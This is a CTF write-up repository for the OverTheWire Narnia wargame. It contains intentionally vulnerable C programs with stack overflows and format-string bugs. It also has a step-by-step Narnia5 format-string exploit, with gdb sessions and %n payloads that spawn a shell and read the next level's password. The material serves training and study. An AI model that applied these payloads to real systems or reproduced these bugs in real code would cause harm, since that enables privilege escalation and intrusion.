11 | 12 | You should have received a copy of the GNU General Public License 13 | along with this program; if not, write to the Free Software 14 | Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 15 | */ 16 | 17 | #include 18 | #include 19 | #include 20 | #include 21 | 22 | extern char **environ; 23 | /* narnia4: wipe every environment string, then copy argv[1] into a fixed-size stack buffer. The header names after #include appear to have been lost when this page was rendered. */ 24 | int main(int argc,char **argv){ 25 | int i; 26 | char buffer[256]; /* fixed-size copy target */ 27 | 28 | for(i = 0; environ[i] != NULL; i++) 29 | memset(environ[i], '\0', strlen(environ[i])); /* zeroes each environment string in place; this removes environment-supplied data from memory but does not touch argv */ 30 | 31 | if(argc>1) 32 | strcpy(buffer,argv[1]); /* BUG: unbounded copy; an argv[1] of 256 bytes or more overruns buffer. A length check or snprintf(buffer, sizeof buffer, "%s", argv[1]) is the fix. */ 33 | 34 | return 0; 35 | } 36 | -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Narnia5/Readme.md: -------------------------------------------------------------------------------- 1 | #Narnia5 2 | 3 | narnia.labs.overthewire.org 4 | 5 | **Username:** narnia5 6 | **Password:** see [narnia4](https://github.com/Alpackers/CTF-Writeups/tree/master/Misc/OverTheWire/Narnia/Naria4) 7 | **Description:** 8 | > This wargame is for the ones that want to learn basic exploitation. You can see the most common bugs in this game and we've tried to make them easy to exploit. You'll get the source code of each level to make it easier for you to spot the vuln and abuse it. 9 | 10 | ##Write-up 11 | 12 | > Just running the program provides us a little bit of a hint. 13 | > 14 | >``` 15 | # ./narnia5 16 | Change i's value from 1 -> 500. No way...let me give you a hint! 17 | buffer : [] (0) 18 | i = 1 (0xffb60dbc) 19 | >``` 20 | > 21 | > Peeking at the code we see: 22 | > 23 | >```C 24 | /* 25 | This program is free software; you can redistribute it and/or modify 26 | it under the terms of the GNU General Public License as published by 27 | the Free Software Foundation; either version 2 of the License, or 28 | (at your option) any later version. 
29 | > 30 | This program is distributed in the hope that it will be useful, 31 | but WITHOUT ANY WARRANTY; without even the implied warranty of 32 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 33 | GNU General Public License for more details. 34 | > 35 | You should have received a copy of the GNU General Public License 36 | along with this program; if not, write to the Free Software 37 | Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 38 | */ 39 | #include 40 | #include 41 | #include 42 | > 43 | int main(int argc, char **argv){ 44 | int i = 1; 45 | char buffer[64]; 46 | > 47 | snprintf(buffer, sizeof buffer, argv[1]); 48 | buffer[sizeof (buffer) - 1] = 0; 49 | printf("Change i's value from 1 -> 500. "); 50 | > 51 | if(i==500){ 52 | printf("GOOD\n"); 53 | system("/bin/sh"); 54 | } 55 | > 56 | printf("No way...let me give you a hint!\n"); 57 | printf("buffer : [%s] (%d)\n", buffer, strlen(buffer)); 58 | printf ("i = %d (%p)\n", i, &i); 59 | return 0; 60 | } 61 | >``` 62 | > 63 | > Ok, looks like we need to manipulate the value of ```i```. There is a lot of ```printf``` usage. Let's try some basic string format entries. 64 | > 65 | >``` 66 | # ./narnia5 %x%x 67 | Change i's value from 1 -> 500. No way...let me give you a hint! 68 | buffer : [f76b9960ffb1f4e6] (16) 69 | i = 1 (0xffb1f50c) 70 | >``` 71 | > 72 | > Looks like the right track. Let's move to gdb and see if we can find our way back up the stack to our input. 73 | > 74 | >``` 75 | (gdb) run $(python -c 'print "AAAA"')%x%x%x%x%x%x%x 76 | Starting program: /root/narnia5 $(python -c 'print "AAAA"')%x%x%x%x%x%x%x 77 | warning: no loadable sections found in added symbol-file system-supplied DSO at 0xf7fde000 78 | Change i's value from 1 -> 500. No way...let me give you a hint! 
79 | buffer : [AAAAf7ed8960ffffd4c6f7e86315ffffd4c7414141416465376630363938] (60) 80 | i = 1 (0xffffd4ec) 81 | [Inferior 1 (process 7402) exited normally] 82 | (gdb) run $(python -c 'print "AAAA"')%x%x%x%x%x 83 | Starting program: /root/narnia5 $(python -c 'print "AAAA"')%x%x%x%x%x 84 | warning: no loadable sections found in added symbol-file system-supplied DSO at 0xf7fde000 85 | Change i's value from 1 -> 500. No way...let me give you a hint! 86 | buffer : [AAAAf7ed8960ffffd4c6f7e86315ffffd4c741414141] (44) 87 | i = 1 (0xffffd4ec) 88 | [Inferior 1 (process 7399) exited normally] 89 | >``` 90 | > 91 | > Looks like we have to read 5 times before we get back to our input. They are already giving us the location of ```i``` as ```0xffffd4ec```, so we should be able to move directly into trying to overwrite the value. To do this we'll use the ```%n``` format as it ```writes the number of bytes written so far```. We can specify the address to change by inserting it at the begining of our input and using ```%x``` to get back to it. Then all we need to do is insert the correct number of bytes and we should be able to overwrite ```i``` with the value ```500```. 92 | > 93 | >``` 94 | (gdb) run $(python -c 'print "\xec\xd4\xff\xff"')%08x%08x%08x%08x%n 95 | Starting program: /root/narnia5 $(python -c 'print "\xec\xd4\xff\xff"')%08x%08x%08x%08x%n 96 | warning: no loadable sections found in added symbol-file system-supplied DSO at 0xf7fde000 97 | Change i's value from 1 -> 500. No way...let me give you a hint! 98 | buffer : [����f7ed8960ffffd4c6f7e86315ffffd4c7] (36) 99 | i = 36 (0xffffd4ec) 100 | >``` 101 | > 102 | > By switching to ```%n``` we can see that we change the value of ```i``` from 1 to 36 so everything appears to be working as expected. Let's go straight for 500. 
103 | > 104 | >``` 105 | [Inferior 1 (process 7340) exited normally] 106 | (gdb) run $(python -c 'print "\xec\xd4\xff\xff"+"A"*464')%08x%08x%08x%08x%n 107 | Starting program: /root/narnia5 $(python -c 'print "\xec\xd4\xff\xff"+"A"*464')%08x%08x%08x%08x%n 108 | warning: no loadable sections found in added symbol-file system-supplied DSO at 0xf7fde000 109 | Change i's value from 1 -> 500. No way...let me give you a hint! 110 | buffer : [����AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA] (63) 111 | i = 1 (0xffffd31c) 112 | [Inferior 1 (process 7344) exited normally] 113 | >``` 114 | > 115 | > Padded 464 ```A``` to make a total of 500, but it looks like our address for ```i``` has moved — by exactly 464 bytes (```0xffffd4ec - 0xffffd31c = 0x1d0```), since the longer argument string itself lives on the stack above ```main```'s frame and pushes everything below it down by the same amount. Let's update that address and try the same payload. 116 | > 117 | >``` 118 | (gdb) run $(python -c 'print "\x1c\xd3\xff\xff"+"A"*464')%08x%08x%08x%08x%n 119 | Starting program: /root/narnia5 $(python -c 'print "\x1c\xd3\xff\xff"+"A"*464')%08x%08x%08x%08x%n 120 | warning: no loadable sections found in added symbol-file system-supplied DSO at 0xf7fde000 121 | Change i's value from 1 -> 500. GOOD 122 | # whoami 123 | root 124 | >``` 125 | > 126 | > That looks better. We are in gdb on the local box. Let's go see if we can reproduce this on the server. 127 | > 128 | >``` 129 | narnia5@melinda:/narnia$ ./narnia5 $(python -c 'print "\x1c\xd3\xff\xff"+"A"*464')%08x%08x%08x%08x%n 130 | Change i's value from 1 -> 500. No way...let me give you a hint! 131 | buffer : [���AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA] (63) 132 | i = 1 (0xffffd50c) 133 | >``` 134 | > 135 | > Address for ```i``` changed again, most likely because the environment and program path outside gdb differ from those inside it, so the stack layout shifts once more. We know what to do. 136 | > 137 | >``` 138 | narnia5@melinda:/narnia$ ./narnia5 $(python -c 'print "\x0c\xd5\xff\xff"+"A"*464')%08x%08x%08x%08x%n 139 | Change i's value from 1 -> 500. GOOD 140 | $ whoami 141 | narnia6 142 | $ cat /etc/narnia_pass/narnia6 143 | ********** 144 | $ 145 | >``` 146 | > 147 | > Man that never gets old. On to narnia6. 
148 | -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Narnia5/narnia5: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/OverTheWire/Narnia/Narnia5/narnia5 -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Narnia5/narnia5.c: -------------------------------------------------------------------------------- 1 | /* 2 | This program is free software; you can redistribute it and/or modify 3 | it under the terms of the GNU General Public License as published by 4 | the Free Software Foundation; either version 2 of the License, or 5 | (at your option) any later version. 6 | 7 | This program is distributed in the hope that it will be useful, 8 | but WITHOUT ANY WARRANTY; without even the implied warranty of 9 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 10 | GNU General Public License for more details. 11 | 12 | You should have received a copy of the GNU General Public License 13 | along with this program; if not, write to the Free Software 14 | Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 15 | */ 16 | #include 17 | #include 18 | #include 19 | 20 | int main(int argc, char **argv){ 21 | int i = 1; 22 | char buffer[64]; 23 | 24 | snprintf(buffer, sizeof buffer, argv[1]); 25 | buffer[sizeof (buffer) - 1] = 0; 26 | printf("Change i's value from 1 -> 500. 
"); 27 | 28 | if(i==500){ 29 | printf("GOOD\n"); 30 | system("/bin/sh"); 31 | } 32 | 33 | printf("No way...let me give you a hint!\n"); 34 | printf("buffer : [%s] (%d)\n", buffer, strlen(buffer)); 35 | printf ("i = %d (%p)\n", i, &i); 36 | return 0; 37 | } 38 | -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Narnia6/narnia6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/OverTheWire/Narnia/Narnia6/narnia6 -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Narnia6/narnia6.c: -------------------------------------------------------------------------------- 1 | /* 2 | This program is free software; you can redistribute it and/or modify 3 | it under the terms of the GNU General Public License as published by 4 | the Free Software Foundation; either version 2 of the License, or 5 | (at your option) any later version. 6 | 7 | This program is distributed in the hope that it will be useful, 8 | but WITHOUT ANY WARRANTY; without even the implied warranty of 9 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 10 | GNU General Public License for more details. 11 | 12 | You should have received a copy of the GNU General Public License 13 | along with this program; if not, write to the Free Software 14 | Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 15 | */ 16 | #include 17 | #include 18 | #include 19 | 20 | extern char **environ; 21 | 22 | // tired of fixing values... 
23 | // - morla 24 | unsigned long get_sp(void) { 25 | __asm__("movl %esp,%eax\n\t" 26 | "and $0xff000000, %eax" 27 | ); 28 | } 29 | 30 | int main(int argc, char *argv[]){ 31 | char b1[8], b2[8]; 32 | int (*fp)(char *)=(int(*)(char *))&puts, i; 33 | 34 | if(argc!=3){ printf("%s b1 b2\n", argv[0]); exit(-1); } 35 | 36 | /* clear environ */ 37 | for(i=0; environ[i] != NULL; i++) 38 | memset(environ[i], '\0', strlen(environ[i])); 39 | /* clear argz */ 40 | for(i=3; argv[i] != NULL; i++) 41 | memset(argv[i], '\0', strlen(argv[i])); 42 | 43 | strcpy(b1,argv[1]); 44 | strcpy(b2,argv[2]); 45 | //if(((unsigned long)fp & 0xff000000) == 0xff000000) 46 | if(((unsigned long)fp & 0xff000000) == get_sp()) 47 | exit(-1); 48 | fp(b1); 49 | 50 | exit(1); 51 | } 52 | -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Narnia7/narnia7: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/OverTheWire/Narnia/Narnia7/narnia7 -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Narnia7/narnia7.c: -------------------------------------------------------------------------------- 1 | /* 2 | This program is free software; you can redistribute it and/or modify 3 | it under the terms of the GNU General Public License as published by 4 | the Free Software Foundation; either version 2 of the License, or 5 | (at your option) any later version. 6 | 7 | This program is distributed in the hope that it will be useful, 8 | but WITHOUT ANY WARRANTY; without even the implied warranty of 9 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 10 | GNU General Public License for more details. 
11 | 12 | You should have received a copy of the GNU General Public License 13 | along with this program; if not, write to the Free Software 14 | Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 15 | */ 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | 22 | int goodfunction(); 23 | int hackedfunction(); 24 | 25 | int vuln(const char *format){ 26 | char buffer[128]; 27 | int (*ptrf)(); 28 | 29 | memset(buffer, 0, sizeof(buffer)); 30 | printf("goodfunction() = %p\n", goodfunction); 31 | printf("hackedfunction() = %p\n\n", hackedfunction); 32 | 33 | ptrf = goodfunction; 34 | printf("before : ptrf() = %p (%p)\n", ptrf, &ptrf); 35 | 36 | printf("I guess you want to come to the hackedfunction...\n"); 37 | sleep(2); 38 | ptrf = goodfunction; 39 | 40 | snprintf(buffer, sizeof buffer, format); 41 | 42 | return ptrf(); 43 | } 44 | 45 | int main(int argc, char **argv){ 46 | if (argc <= 1){ 47 | fprintf(stderr, "Usage: %s \n", argv[0]); 48 | exit(-1); 49 | } 50 | exit(vuln(argv[1])); 51 | } 52 | 53 | int goodfunction(){ 54 | printf("Welcome to the goodfunction, but i said the Hackedfunction..\n"); 55 | fflush(stdout); 56 | 57 | return 0; 58 | } 59 | 60 | int hackedfunction(){ 61 | printf("Way to go!!!!"); 62 | fflush(stdout); 63 | system("/bin/sh"); 64 | 65 | return 0; 66 | } 67 | -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Narnia8/narnia8: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/OverTheWire/Narnia/Narnia8/narnia8 -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Narnia8/narnia8.c: -------------------------------------------------------------------------------- 1 | /* 2 | This program is free software; you can redistribute it and/or modify 3 | it under the terms of the 
GNU General Public License as published by 4 | the Free Software Foundation; either version 2 of the License, or 5 | (at your option) any later version. 6 | 7 | This program is distributed in the hope that it will be useful, 8 | but WITHOUT ANY WARRANTY; without even the implied warranty of 9 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 10 | GNU General Public License for more details. 11 | 12 | You should have received a copy of the GNU General Public License 13 | along with this program; if not, write to the Free Software 14 | Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 15 | */ 16 | #include 17 | #include 18 | #include 19 | // gcc's variable reordering fucked things up 20 | // to keep the level in its old style i am 21 | // making "i" global unti i find a fix 22 | // -morla 23 | int i; 24 | 25 | void func(char *b){ 26 | char *blah=b; 27 | char bok[20]; 28 | //int i=0; 29 | 30 | memset(bok, '\0', sizeof(bok)); 31 | for(i=0; blah[i] != '\0'; i++) 32 | bok[i]=blah[i]; 33 | 34 | printf("%s\n",bok); 35 | } 36 | 37 | int main(int argc, char **argv){ 38 | 39 | if(argc > 1) 40 | func(argv[1]); 41 | else 42 | printf("%s argument\n", argv[0]); 43 | 44 | return 0; 45 | } 46 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | #CTF Writeups 2 | by: Alpackers 3 | 4 | The Alpackers were formed in early 2015 by industry professionals who wanted to break things and learn. This is our attempt to contribute back. 5 | 6 | To date we have participated in the following events: 7 | * PlaidCTF 2015 8 | * PoliCTF 2015 9 | * CSAW CTF Qualification Round 2015 10 | * Boston Key Party 2016 11 | * Ice CTF 2016 12 | * Hack the Vote 2016 13 | * Boston Key Party 2017 14 | --------------------------------------------------------------------------------